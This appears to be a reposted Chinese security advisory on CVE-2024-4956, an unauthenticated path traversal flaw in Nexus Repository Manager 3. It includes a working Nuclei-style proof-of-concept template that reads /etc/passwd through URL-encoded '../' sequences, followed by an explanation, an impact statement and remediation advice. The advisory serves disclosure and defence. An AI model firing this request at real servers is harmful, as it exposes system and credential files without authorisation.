漏洞描述
Nexus Repository Manager 3 是一个流行的仓库管理工具,用于存储和管理软件组件。该漏洞允许攻击者通过构造特定的请求,未经认证地访问系统上的任意文件。这是由于路径遍历漏洞造成的,攻击者可以利用该漏洞读取系统上的敏感文件。
漏洞利用细节
通过向Nexus Repository Manager 3发送特定的路径遍历请求,攻击者可以读取系统上的敏感文件,如/etc/passwd
。以下是一个利用此漏洞的POC示例:
请求示例
id: CVE-2024-4956-POC
info:
name: Nexus Repository Manager 3 Unauthenticated Path Traversal
author: banditz
severity: high
metadata:
app="Nexus-Repository-Manager" :
requests:
method: GET
path:
'{{BaseURL}}/%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd'
matchers:
type: word
words:
"root:.*:0:0"
part: body
解释
上述POC中,通过向Nexus Repository Manager 3发送一个特制的HTTP GET请求,路径包含多个
%2F
(即斜杠/
的URL编码),结合路径遍历字符..
,最终目标是访问/etc/passwd
文件。若请求成功,将在响应体中包含root:.*:0:0
等标识符,表明系统的/etc/passwd
文件被读取。漏洞影响
该漏洞影响使用Nexus Repository Manager 3的系统,攻击者可利用此漏洞读取系统上的任意文件,可能导致敏感信息泄露,如用户凭证和系统配置文件。
修复建议
为了防止此漏洞被利用,建议采取以下措施:
更新软件:及时将Nexus Repository Manager 3更新至最新版本,以确保修复已知的安全漏洞。
限制访问:通过防火墙和访问控制列表,限制对Nexus Repository Manager 3服务的访问,仅允许可信任的IP地址进行访问。
监控和检测:使用入侵检测系统(IDS)和入侵防御系统(IPS),监控和检测可疑的请求和活动。
结语
CVE-2024-4956是一个严重的路径遍历漏洞,影响Nexus Repository Manager 3。用户应及时采取措施修复漏洞,以确保系统的安全性。同时,保持软件的定期更新和安全配置是防范此类漏洞的关键。
原文始发于微信公众号(云梦安全):CVE-2024-4956: Nexus Repository Manager 3 未经认证的路径遍历漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论